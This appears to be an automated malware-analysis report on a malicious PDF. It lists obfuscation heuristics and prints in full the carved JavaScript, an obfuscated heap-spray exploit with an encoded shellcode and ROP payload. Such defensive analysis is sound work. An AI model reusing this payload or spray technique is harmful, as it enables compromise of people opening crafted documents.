MALICIOUS
178
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9386
Heuristics 7
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
XFA form low PDF_XFAPDF uses XML Forms Architecture — can contain script logic
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xdp/ In PDF document text
- http://www.xfa.org/schema/xci/2.6/In PDF document text
- http://www.xfa.org/schema/xfa-template/2.6/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0012_000.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0xA1F7 | 3805 bytes |
SHA-256: 09facb3cfebd564985b4a624c4fe038106f77656e1e516616c8131ca3b68e056 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
6 of 11 identifiers look randomly generated (e.g. 'lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYi') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var oZsKBMQBYTyRMyKOaFUOBmHomyuoePBAYTOTcolsUnaBUDqDN = unescape; var ppoat = oZsKBMQBYTyRMyKOaFUOBmHomyuoePBAYTOTcolsUnaBUDqDN( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc6da%u74d9%uf424%ub3bb%ue347%u5d19%uc931%u59b1%u5d31%u0319%u195d%uc583%u5104%u1fb2%u1af1%ue03d%u4402%u320f%u0f66%u823d%ueaee%ub049%u7ffc%u211f%u80cc%ufeaf%u5864%u723b%u9551%udffb%ub49d%u1d87%u16f2%uedb9%u5707%ubbfe%ub862%u6b52%u1406%u1843%ua45a%uce62%u94d0%u6b1c%u6026%u7291%u0377%u5571%u9827%u8dca%u4dc6%u644f%u4dbc%u4619%u26c2%u23ad%uee3d%uf3ff%ucf92%uf9cf%u08eb%ue1f7%u6299%u9f0b%ub199%u7b71%u252f%u08d1%u8197%udde3%u424e%uaaef%u0c05%u2dec%u27c9%ua508%ue7ec%ufd98%u23ca%ua6c0%u7273%u09ac%u648b%uf508%uef29%ue0bb%u104e%u0d44%u8613%uc088%u56ac%u5387%u64de%uc808%uc448%ud6c1%u5d8f%ue8c5%ue540%u1686%u1561%udc8e%u4535%uf5b8%u0e35%uf938%ubae3%u6d32%u4306%u5c07%ub17e%u9387%u3c7b%ufb61%u6ed3%ubc3e%uce83%u54ee%uc1ce%u45d1%u08f1%uef7a%ue41e%u98d2%uad87%u39a9%u7847%u7ad4%u88c3%u3428%uf924%u213a%u0153%ub2c3%u01f6%ub6a9%u5650%ub545%u9085%u46ca%ua3e0%ub80d%u9575%u8f66%u99e3%uf010%u19e3%ua6e1%u1969%u1e89%u4aca%u60ac%uffc7%uf57d%ua9e8%u5ed2%u5781%ua80c%ua80e%uaa7b%u5649%u85f9%u3ef1%u9601%ube01%u166b%ud652%u3960%u165d%u9088%u3e36%u7503%udff4%u5c14%u4158%u5314%u7241%u1c6f%u7376%u3490%u7413%u3890%u4925%u0146%u8c53%u365a%ubb6c%u1fff%uc3e7%u60ac%u4122' ); var JqAcVlOJrFuiLZaTXNaMvpTmnYrbJlWrfiSyoyBwlWXhMQXoFvXnTOkaZMGC = oZsKBMQBYTyRMyKOaFUOBmHomyuoePBAYTOTcolsUnaBUDqDN( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (JqAcVlOJrFuiLZaTXNaMvpTmnYrbJlWrfiSyoyBwlWXhMQXoFvXnTOkaZMGC.length + 20 + 8 < 65536) JqAcVlOJrFuiLZaTXNaMvpTmnYrbJlWrfiSyoyBwlWXhMQXoFvXnTOkaZMGC+=JqAcVlOJrFuiLZaTXNaMvpTmnYrbJlWrfiSyoyBwlWXhMQXoFvXnTOkaZMGC; PMhWOeNolR = JqAcVlOJrFuiLZaTXNaMvpTmnYrbJlWrfiSyoyBwlWXhMQXoFvXnTOkaZMGC.substring(0, (0x0c0c-0x24)/2); PMhWOeNolR += ppoat; PMhWOeNolR += JqAcVlOJrFuiLZaTXNaMvpTmnYrbJlWrfiSyoyBwlWXhMQXoFvXnTOkaZMGC; lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYiobvVDRTzkdbOeRrVVdhirodoXZevzfRHBBGNuUVSrekSnrMMbRI = PMhWOeNolR.substring(0, 65536/2); while(lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYiobvVDRTzkdbOeRrVVdhirodoXZevzfRHBBGNuUVSrekSnrMMbRI.length < 0x80000) lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYiobvVDRTzkdbOeRrVVdhirodoXZevzfRHBBGNuUVSrekSnrMMbRI += lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYiobvVDRTzkdbOeRrVVdhirodoXZevzfRHBBGNuUVSrekSnrMMbRI; XfgZhsrVimSg = lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYiobvVDRTzkdbOeRrVVdhirodoXZevzfRHBBGNuUVSrekSnrMMbRI.substring(0, 0x80000 - (0x1020-0x08) / 2); var QJgwtPwQCifkFPPLDEthrLBymhRGpEVlCynMdMtWfAJwULluMQ = new Array(); for (tAqJgkvkRiWrCdzDMJeOUuAzPYvjFUBDaQPgfqpCDJlfF=0;tAqJgkvkRiWrCdzDMJeOUuAzPYvjFUBDaQPgfqpCDJlfF<0x1f0;tAqJgkvkRiWrCdzDMJeOUuAzPYvjFUBDaQPgfqpCDJlfF++) QJgwtPwQCifkFPPLDEthrLBymhRGpEVlCynMdMtWfAJwULluMQ[tAqJgkvkRiWrCdzDMJeOUuAzPYvjFUBDaQPgfqpCDJlfF]=XfgZhsrVimSg+"s"; |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.